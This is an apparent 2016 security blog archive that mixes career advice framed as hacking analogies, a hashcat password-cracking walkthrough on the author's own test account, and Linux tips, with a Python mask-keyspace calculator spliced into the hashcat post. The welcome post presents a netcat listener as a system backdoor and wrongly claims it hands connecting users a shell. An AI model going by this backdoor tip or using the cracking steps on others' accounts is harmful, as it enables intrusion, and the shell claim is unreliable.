<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqvtSJNzU69zOXNjWP4O43JPn3ibQEX8lvSRkk8Rc3C27o8i9PsQjRpT2oWNv1NzkZDUNWqGjoNNIzbJ411Y4TbEHwpMTf1VW8H-O_yphKV4SSWuM8LYLcVZp2i_LVdR1JDNOBWoNZtOvl/s1600/Screenshot+from+2016-06-15+21%253A26%253A55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqvtSJNzU69zOXNjWP4O43JPn3ibQEX8lvSRkk8Rc3C27o8i9PsQjRpT2oWNv1NzkZDUNWqGjoNNIzbJ411Y4TbEHwpMTf1VW8H-O_yphKV4SSWuM8LYLcVZp2i_LVdR1JDNOBWoNZtOvl/s320/Screenshot+from+2016-06-15+21%253A26%253A55.png" width="320" /></a></div>
<br />
<br />
Step 7: Exploit for fun and profit! Good luck and add all the exploits!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhV-C9PDmceNI6a6xa2ger2_B-g0lSeec8BfrQ-QwCoKFae9wvlIfMVIUTEww_jX7HZ1ik3PrpSFyG8SGAVqaorYJ4jhsiKuRhFMn0hXmxbDUDUcCzjIAO9XX4trIinVdnH6UfLa0vOEL/s1600/Screenshot+from+2016-06-15+21%253A35%253A58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhV-C9PDmceNI6a6xa2ger2_B-g0lSeec8BfrQ-QwCoKFae9wvlIfMVIUTEww_jX7HZ1ik3PrpSFyG8SGAVqaorYJ4jhsiKuRhFMn0hXmxbDUDUcCzjIAO9XX4trIinVdnH6UfLa0vOEL/s320/Screenshot+from+2016-06-15+21%253A35%253A58.png" width="320" /></a></div>
Austin<br />
<br />
A Hacker's Digest about Criticizing, Condemning and Complaining (published 2016-05-19, updated 2016-06-15)<br />
<br />
For the next few professional development related posts, I am going to be giving my commentary on Dale Carnegie's book, How to Win Friends & Influence People.<br />
<br />
In my mind, this book is a must-read for every human being because no matter what job you're doing or with whom you're working, you will have to deal with another human being. This book describes many different ways to work with, deal with, and even succeed with people (see <a href="https://en.wikipedia.org/wiki/How_to_Win_Friends_and_Influence_People" target="_blank">here</a>), and I am going to give you my digest of the first chapter and its principle: "Don't criticize, condemn, or complain."<br />
<br />
So what does that principle mean in the real world? Essentially, it means learn to keep your mouth shut about other PEOPLE. I emphasize the word people because you can still completely disagree with, reject, or criticize an idea without criticizing or condemning the person who proposed it. That is a skill that takes many, many years to learn and master, but it's the difference between a good and a great employee, or between a highly technical employee and the Technical Director of a company. So what does criticizing a person look like? "You're late", "You missed another meeting", "How could you say something like that?", "Who do you think you are?" and so on. Criticism of a person really comes down to making them the subject of the criticism rather than its direct or indirect object. For example, what's the difference between "You missed another meeting" and "Meetings in the future will benefit from your attendance"? A couple of things: one, the subject changed from 'you' to 'the meeting'; two, the tone of the sentence switched from negative to positive. Instead of talking about a person's faults, recognize the improvement and positive impact that person could have on the meeting when they attend. This will make them feel welcomed and like they belong at that meeting; ultimately, people just want to belong.<br />
<br />
I am grouping criticism and condemnation together because I believe condemnation is qualitatively the same as criticism; you can use whatever scaling factor or words you like to make their definitions equal. Complaining, however, can be very different. First off, no one likes people who complain constantly about their life, their kids, their spouse, their job, their knees, etc. However, complaining can be very cathartic for those who have the aforementioned afflictions and tend to process their emotional, mental, and physical pain verbally; thus, we have complainers. I don't believe complaining will get you anywhere professionally, especially in the hacking community, because our merit and community worth are rooted in our desire to learn, struggle, and conquer challenging tasks, technologies, and processes in order to more completely understand the way something works and exploit its design for our own use. So, how do we combat complaining, especially when "my boss sucks", "I can't get a job", or "I'm not about that corporate life, man"? The answer is: hack yourself.<br />
<br />
Yes, hack yourself. Find out how you work. Find out what makes you tick, what gets you up in the morning, why you don't like certain foods, why you prefer the weather or climate that you do, why you're reading this blog, why you're living where you are, why you're with whomever you're with (friends, spouses, girlfriends/boyfriends). Fair warning: this takes work. This takes dedication and work. The results are all on you and how much you truly, truly want to know who you are. This is the only time you should run an Nmap scan with every option set, so you can learn the most about the human box you're going to hack. Once you know yourself and know exactly how you work, you can exploit the buffer overflows in your psyche and take advantage of who you are rather than making excuses for who you are. For example, if you're a night owl, then do your best work at night when your mind is sharpest. If you don't like the way you feel after eating Chinese takeout, then stand up for yourself and suggest an alternative when your office or group of friends decides to go there. If you really feel energized by taking a bath after dinner, then plan to take a bath after dinner so you can be the optimal you that day.<br />
<br />
Once you figure out how everything affects you, you can minimize the complaining in your life and start looking for exploits in yourself and your environment to improve yourself. <br />
<br />
Work on recognizing when you criticize others, when others criticize others, and when others criticize you. Once you notice it, make a choice not to criticize or condemn others and to include them in your professional life. You never know when someone might surprise you, and supporting them when they need it most will help everyone involved.<br />
<br />
Austin<br />
<br />
Password Cracking: Hashcat (published 2016-05-07, updated 2016-06-15)<br />
<br />
For hackers and security analysts who crack passwords, make sure you learn to use hashcat too! I normally use JTR (John the Ripper, aka John), but a friend of mine pointed out that hashcat is also a very viable tool. He insists that it's better than John, but I have not tested them against each other, nor am I saying one is better than the other. They are both password cracking tools, and any great hacker/security analyst should be able to use either proficiently.<br />
<br />
To get a basic understanding of how hashcat works, check out these posts*: <br />
<ul>
<li>http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-3-using-hashcat-0156543/</li>
<li>http://hashcat.net/wiki/</li>
<li>https://www.samsclass.info/123/proj10/p12-hashcat.htm</li>
</ul>
Now, for both my and my readers' benefit, I am going to walk through using this tool to crack passwords.<br />
<br />
First, I am going to create a new user so I can crack the password. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_b2Ro4QJ-lTNC3SMHNCIhl0c_5J_hh4-D3Og_jiFWHOfGC7C2T3jQ-BJAYpNx3pBnB56GbNbnu3jNBwiCdSn0uJIgfHRx9bJZGvgYNUA0OxGdWKKebC3wyEHnNqTMmR5eOLerVa1jYkwu/s1600/Screenshot+from+2016-05-07+19%253A08%253A30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_b2Ro4QJ-lTNC3SMHNCIhl0c_5J_hh4-D3Og_jiFWHOfGC7C2T3jQ-BJAYpNx3pBnB56GbNbnu3jNBwiCdSn0uJIgfHRx9bJZGvgYNUA0OxGdWKKebC3wyEHnNqTMmR5eOLerVa1jYkwu/s320/Screenshot+from+2016-05-07+19%253A08%253A30.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
Now, I am going to follow the instructions in the articles above to crack this password (it's fairly simple to start ;) )<br />
<br />
I put my hashcat1 user line from /etc/shadow into the hash.lst file. I checked the hash function and it is SHA512. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXkHeR0GnTPj4Z_0nE64015Xkyxg4uN9RU2h8NJRKSyJAY3gRjegiZtsR0T2U_EMNF4RBDnrFb2dn2k9NJOW8gd3tfQCP3QuhY96PNVTCoaDO36lxoKG9O1YwIIynJx99p1ZyUFZ0OluVW/s1600/Screenshot+from+2016-05-07+19%253A15%253A17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXkHeR0GnTPj4Z_0nE64015Xkyxg4uN9RU2h8NJRKSyJAY3gRjegiZtsR0T2U_EMNF4RBDnrFb2dn2k9NJOW8gd3tfQCP3QuhY96PNVTCoaDO36lxoKG9O1YwIIynJx99p1ZyUFZ0OluVW/s320/Screenshot+from+2016-05-07+19%253A15%253A17.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsVAkB8VOJt1ftiW-OphtlDynks1wn9U8GFjdc5WpT-kD9M8piit8mjMJmJBb6rgeC_A9-t1SGGToYmEBBbO2SvcdZnbfwX_Cri2JdWJBH-DZC_IYQm4eo4UY3rnZZ7k0Iv4iL2K0RBmuy/s1600/Screenshot+from+2016-05-07+19%253A16%253A21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsVAkB8VOJt1ftiW-OphtlDynks1wn9U8GFjdc5WpT-kD9M8piit8mjMJmJBb6rgeC_A9-t1SGGToYmEBBbO2SvcdZnbfwX_Cri2JdWJBH-DZC_IYQm4eo4UY3rnZZ7k0Iv4iL2K0RBmuy/s320/Screenshot+from+2016-05-07+19%253A16%253A21.png" width="320" /></a></div>
<br />
Now, I will run the same commands to crack this password.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLmztLiDZNe_V0HdLYOqnt7Y9VPpGoGui8I0A8Sx6UxGFD8qbO_pZOetuOCeL1xMA9mu9Trh-8pLtqhs4TM7LbM9MgStkIU7ax_rUyjBeZjqlZ7jaXNI0d2X2kktVIJHnLz6FZvnLk_Tsg/s1600/Screenshot+from+2016-05-07+19%253A25%253A12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLmztLiDZNe_V0HdLYOqnt7Y9VPpGoGui8I0A8Sx6UxGFD8qbO_pZOetuOCeL1xMA9mu9Trh-8pLtqhs4TM7LbM9MgStkIU7ax_rUyjBeZjqlZ7jaXNI0d2X2kktVIJHnLz6FZvnLk_Tsg/s320/Screenshot+from+2016-05-07+19%253A25%253A12.png" width="320" /></a></div>
<br />
<br />
<br />
It worked in THREE seconds. Now, to be fair, it was a dictionary word and I used the rockyou dictionary to crack it. Let's make it a little more difficult for hashcat. I created a password that uses uppercase and lowercase letters. Let's see how hashcat does.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRcafqK2SZwuiI7TN3TQh8cFvkN_b-5V4G6z97QwPVyGnC0OgkK097bgyx5HfMLuc8GkS2sNv30_lu790JmbIMKIAD5WzfpYuBabYSsS_GuEo4HytfDjOvjgUMSgUr2jOiH8ag5R-rKxjh/s1600/Screenshot+from+2016-05-07+20%253A26%253A44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRcafqK2SZwuiI7TN3TQh8cFvkN_b-5V4G6z97QwPVyGnC0OgkK097bgyx5HfMLuc8GkS2sNv30_lu790JmbIMKIAD5WzfpYuBabYSsS_GuEo4HytfDjOvjgUMSgUr2jOiH8ag5R-rKxjh/s320/Screenshot+from+2016-05-07+20%253A26%253A44.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
Hashcat allows 'masks', which let you specify which types of characters go where in the password. As we can see, I have an upper case letter followed by 4 lower case letters, then an upper case letter followed by 5 lower case letters: two words put together, each with its first letter capitalized. These masks allow very specific guessing of passwords and drastically reduce the keyspace that hashcat needs to search. For example, if you knew only that I used upper and lower case letters and that the password was 11 characters long, the keyspace is 52^11 ~ 7.5*10^18. By specifying the mask, we reduce the keyspace to 26^11 ~ 3.6*10^15, approximately 2000 times smaller. So if we go by hashcat's output of 10 years for the masked search, the unmasked search would take around 20,000 years. This is a great example of how computationally expensive cracking passwords can get just by adding one more letter or one more set of characters (numbers, upper case, lower case, special).<br />
<br />
Hashcat supports masks, dictionary files, combinations of dictionary words from files, permutations of words from a dictionary, hybrid attacks, table lookups, and rule-based attacks. I recommend looking at hashcat's wiki to understand the more complex attacks; they can get pretty specific, and the more you know about the potential password, the easier it will be to crack.<br />
<br />
Lastly, if anyone is looking for unsolicited advice, I always recommend using a pass<b>phrase</b> rather than a pass<b>word</b>. 'ILoveMyCatSoMuch!0906' combines a statement that could be true about you (easy to remember), punctuation that emphasizes that statement, and (in this case) your cat's birthday. The result is a very secure password: it incorporates all four categories of characters, it is 21 characters long, and it's easy to remember because it's a true statement about yourself. Now, like everything else, this is exploitable; specifically, it is subject to social engineering. This password could be guessed; however, the attacker would have to know you love your cat, which letters you capitalized, which order each word goes in, and which order the sentence, punctuation, and birthday go in (for example, !0906ILoveMyCatALot, MyCatFluffyWasBorn0906, and 123MyCatIsSoAwesome?!?! are all great passwords that revolve around an important part of your life).<br />
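To make the keyspace arithmetic behind the mask comparison (52^11 versus 26^11) and the "all four character categories, 21 characters" passphrase claim concrete, here is an added Python calculator; it is not hashcat's code and not from the original post. It assumes hashcat's built-in charset sizes (?l, ?u, ?d, ?s, ?a), the masks and passwords in it are constructed, and the crack-time estimate uses whatever guess rate you pass in.<br />

```python
"""Keyspace arithmetic for hashcat masks (added example for this post, not
hashcat's own code; mask and password values below are constructed)."""
from __future__ import annotations

import math
import string

# hashcat's built-in mask charsets (?b, the 256 raw byte values, is omitted).
BUILTIN: dict[str, set[str]] = {
    "l": set(string.ascii_lowercase),    # 26
    "u": set(string.ascii_uppercase),    # 26
    "d": set(string.digits),             # 10
    "s": set(" " + string.punctuation),  # 33: space plus printable punctuation
}
BUILTIN["a"] = BUILTIN["l"] | BUILTIN["u"] | BUILTIN["d"] | BUILTIN["s"]  # 95
SECONDS_PER_YEAR = 365 * 24 * 3600


def _tokens(spec: str):
    """Yield ('charset', key) or ('literal', char) per position of a mask/charset spec."""
    i = 0
    while i < len(spec):
        if spec[i] != "?":
            yield "literal", spec[i]
            i += 1
        elif i + 1 == len(spec):
            raise ValueError("dangling '?' at end of spec")
        else:
            # '??' is an escaped question mark; '?x' names a charset
            yield ("literal", "?") if spec[i + 1] == "?" else ("charset", spec[i + 1])
            i += 2


def expand_charset(spec: str) -> set[str]:
    """Expand a -1..-4 custom charset spec such as '?l?d' or '?d-_' into a set of characters."""
    chars: set[str] = set()
    for kind, value in _tokens(spec):
        if kind == "literal":
            chars.add(value)
        elif value in BUILTIN:
            chars |= BUILTIN[value]
        else:
            raise ValueError(f"unknown charset ?{value} in custom charset")
    return chars


def mask_keyspace(mask: str, custom: dict[str, str] | None = None) -> int:
    """Candidates a mask generates; `custom` maps '1'..'4' to the -1..-4 charset specs."""
    custom_sets = {k: expand_charset(v) for k, v in (custom or {}).items()}
    sizes = []
    for kind, value in _tokens(mask):
        if kind == "literal":
            sizes.append(1)          # a literal character fixes that position
        elif value in BUILTIN:
            sizes.append(len(BUILTIN[value]))
        elif value in custom_sets:
            sizes.append(len(custom_sets[value]))
        else:
            raise ValueError(f"unknown charset ?{value} in mask")
    return math.prod(sizes)


def password_keyspace(password: str) -> int:
    """Keyspace faced by an attacker who knows only the length and which character classes appear."""
    classes = [
        (any(c.islower() for c in password), 26),
        (any(c.isupper() for c in password), 26),
        (any(c.isdigit() for c in password), 10),
        (any(not c.isalnum() for c in password), 33),  # hashcat's ?s
    ]
    alphabet = sum(size for used, size in classes if used)
    return alphabet ** len(password)


def crack_years(keyspace: int, hashes_per_second: float) -> float:
    """Worst-case time to exhaust a keyspace at a given guess rate."""
    return keyspace / hashes_per_second / SECONDS_PER_YEAR
```

With the post's mask `?u?l?l?l?l?u?l?l?l?l?l`, `52 ** 11 // mask_keyspace(mask)` is exactly 2048, the "approximately 2000 times smaller" figure above.<br />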
<br />
There is no silver bullet to password cracking but hashcat is a very powerful password cracking tool and I'm very happy I decided to add it to my arsenal of hacking tools. Look it up, learn it, be great!<br />
<br />
<br />
<br />
*These posts are not in any particular order, I am not receiving any compensation from anyone to post these sites, and these sites do not necessarily reflect my opinion, my employer's opinion, or the opinions of any certification bodies whose certificates I hold.<br />
<br />
Austin<br />
<br />
Professional Development Methodology (published 2016-05-06, updated 2016-06-15)<br />
<br />
Most hackers/security analysts have been exposed to the 'Hacking Methodology.' In general, it is as follows:<br />
<ol>
<li>Perform Recon</li>
<ol>
<li>Passive</li>
<li>Active</li>
</ol>
<li>Enumeration</li>
<li>Exploitation</li>
<li>Privilege Escalation</li>
<li>Exfiltration</li>
<li>Persistence</li>
</ol>
You can argue semantics all you like, but skilled hackers/penetration testers/security analysts will follow these steps, and the more determined the attacker is, the more time they will spend in recon and enumeration. This is where most of the work of hacking is done, and to extend the analogy to professional development, it is where you should spend most of your time hacking (read: developing) yourself. In addition, your professional development results are directly correlated with how much time and effort you put into yourself, just like spending time researching your target before you exploit it.<br />
<br />
So, you're here, reading this post. What is it that you want to improve? Where do you envision yourself in 1, 5, 10 years? How do you do that? Recon!<br />
<br />
Passive recon for professional development, especially when it comes to the computer security industry, is very useful. Read blogs, read books, listen to podcasts, and learn about the industry. Who are the big names? Why are they the big names? What are the basics of the industry? This extends outside of hacking or computer security! If you want to be a musician, you start by learning how to read music. If you want to be a doctor, you start by learning biology.<br />
<br />
Active recon for professional development is more participatory. In the computer security industry, it would be participating in CTFs, or downloading Metasploitable and running some exploits. You are still honing your skills and solidifying your baseline understanding. Extending this to other industries and professional development in general, it becomes the Nike slogan: Just do it. If you want to be an artist, just paint. If you want to break into the finance industry, start by budgeting your own finances.<br />
<br />
Active and passive recon will be a permanent part of hacking and professional development and no matter what, you should always spend SOME time in this area so you can continue to learn and improve upon new skills. <br />
<br />
Enumeration, in terms of professional development, is listing out what you want to or need to work on in order to become a professional, IN YOUR TERMS. That's the most important part. What do YOU believe, based on your passive and active recon, you need to accomplish to push yourself forward? Only you can make yourself a professional, only you can push yourself to accomplish what you want, and only you know where you stand on any individual skill. So enumerate them, and then perform more passive and active recon if necessary.<br />
<br />
Now, it's time for everyone's favorite part of the hacking methodology: Exploitation. What is exploitation when it comes to professional development? It's your first shot. Your big break. Your first painting sold. Your first taxes filed as a CPA. Your first patient as a doctor. Your first computer exploited with MS08-067 (if you don't know which exploit that is, add it to your passive and active recon). This is a very important step and also where a lot of people fail. Lots of people can't take rejection of their ideas, business plans, or pieces of art. You MUST be able to take this rejection. Something that helped me deal with rejection is understanding that I am as much of the product as what I do, which includes this blog! I am confident in my knowledge and what I've learned, and I believe it is worthwhile to spread that knowledge. My first post on this blog got 10 views. Only 10, but there were people from three different countries who viewed it! I choose to focus on those individuals across the world who may or may not have been influenced by my first post rather than on the fact that only 10 people saw it. Your rejections make excellent stepping stones to your ultimate success.<br />
<br />
Lastly, privilege escalation, exfiltration, and persistence can all be combined, when it comes to professional development, into professional maintenance. You are the best you in the world. So be the best you, and continue to be the best you the world has ever seen. Continue to do recon, continue to actively enumerate future steps in your journey, continue to step outside of your comfort zone and show the world what you can do. Every failure is something to learn from and every success is something to celebrate, but you are never done. Use the Navy SEAL 40% rule: when you think you're done, you're only 40% done.<br />
<br />
So all you hackers out there who want to become more professional or develop yourselves, keep this analogy in mind and, as Offensive Security says about their OSCP certification, Try Harder.<br />
<br />
Austin<br />
<br />
Welcome (published 2016-05-03, updated 2016-06-15)<br />
<br />
For an aspiring security expert, there are many blogs, podcasts, articles, and tutorials for learning anything and everything about security from a technical perspective.<br />
<br />
There are also many professional development resources that might be ignored by the security community or simply not relevant to our field.<br />
<br />
I am going to combine our desire for highly technical learning with help in conquering one of our biggest problems: professional development. In my experience this is also phrased as "helping management understand", "convincing C-level execs to spend money on security", or "Ugh, my boss is such an idiot, he doesn't understand how security works."<br />
<br />
So for my first post, I'm going to give you three professional development tips and three technical bits of information.<br />
<br />
Professional Development:<br />
<ol>
<li>95% of the time it's better to hold your tongue and say nothing. The other 5% of the time it's best to hold your tongue, sleep on your response, and form your response in a constructive, supportive, problem-solving manner. If you want to convince managers to like you, support you, and provide you with what you need, then you need to help them to help you. You don't have to be best friends with your management, but having a positive working relationship will make everyone's life easier.</li>
<li>Invest in yourself. Whether this means training on a new technology, a vacation to reduce stress, or going back to school to advance your current skills and/or gain new ones, most companies offer opportunities to do this. Go for it! Take advantage of these opportunities to become the best incident handler, technical manager, penetration tester, security engineer, etc. that your company has. Professional development is not all about improving your soft skills.</li>
<li>I know I just said it's not all about improving your soft skills but, it is ALWAYS beneficial to work on your soft skills. Always. Better writing, better speaking, better conflict resolution, better change management, etc. Any highly respected individual has a great aptitude in these areas and knows how to use them to solve problems. Business is all about solving problems and if you can't communicate your solutions, no matter how great they are, they will never be implemented. </li>
</ol>
Technical Bits:<br />
<ol>
<li>If you're sick of seeing tons of errors while typing commands on the Linux command line, redirect STDERR to a file or, my favorite, /dev/null. So after you type your command, <i>ping -c 3 777.777.777.777</i>, append 2>/dev/null if you never want to see or recover your errors. Otherwise, write 2>errors.txt. It will look like this: <i>ping -c 3 777.777.777.777 2>/dev/null</i> or <i>ping -c 3 777.777.777.777 2>errors.txt</i>. If you chose to redirect STDERR to errors.txt, you can <i>cat errors.txt</i> and you will see the following error message: <i>ping: unknown host 777.777.777.777</i>. I often use this to eliminate errors while I am grepping for a file in a file system, so I only see my findings and not all the errors about directories I cannot access.</li>
<li>In my opinion, there is one best way of listing files in a directory on Linux: <i>ls -halt &lt;directory&gt;</i> (if no directory is specified, it lists the current directory; if you don't know where you are, run <i>pwd</i>). Each of these flags has an important use, and 'halt' is also very easy to remember. -h renders the sizes of the files in a human-readable format, such as 23KB or 4GB instead of 2342523 bytes. -a lists all the files, including the current directory . and the directory one level up .. (you can use -A to hide those, but I never remember that when I'm actually running the command). -l prints the results in the 'long listing' format. The difference is quite dramatic, so I recommend the reader run both <i>ls -hat</i> and <i>ls -halt</i> to see the differences, but in short, one shows you all the files and the other shows you all the files with all of their metadata. Lastly, the -t flag orders the files by modification time, newest first. This can be really helpful from an incident handling perspective to see which files have been modified recently by malware, a malicious user, or a guilty employee trying to cover their tracks.</li>
<li>The simplest way to make a backdoor in any system is using netcat! This tool is invaluable for security experts, and whether you believe you know it well or not, go read about it again. In fact, I am going to as soon as I finish writing this post. <i>nc -nvlp &lt;port&gt;</i>. That is how you make a backdoor in any system. -n disables DNS lookups, so you just need the IP address to reconnect. -v is verbose; depending on the security posture and what your intentions are for setting up the back door, use this flag to fit your needs. -l is to listen (which is why you don't specify an IP address in this command). -p is for the port. Now, the downside is that anyone who finds this port can simply connect and will have a shell as whatever user ran the 'nc' command. On the upside, this tool is very versatile and you will use it for the rest of your security career, so you might as well get really, really comfortable with it.</li>
</ol>
I hope you guys enjoyed my first post. I will be making them as often as I can, and feel free to reach out to me with suggestions or comments on my blog. I make no guarantees about anything, but I consider myself a reasonable person. I should also mention that my thoughts, comments, and opinions are my own and do not represent any companies I work for, am associated with, or am certified by. We are starting a new era of highly professional, highly technical security experts.<br />
<br />
Austin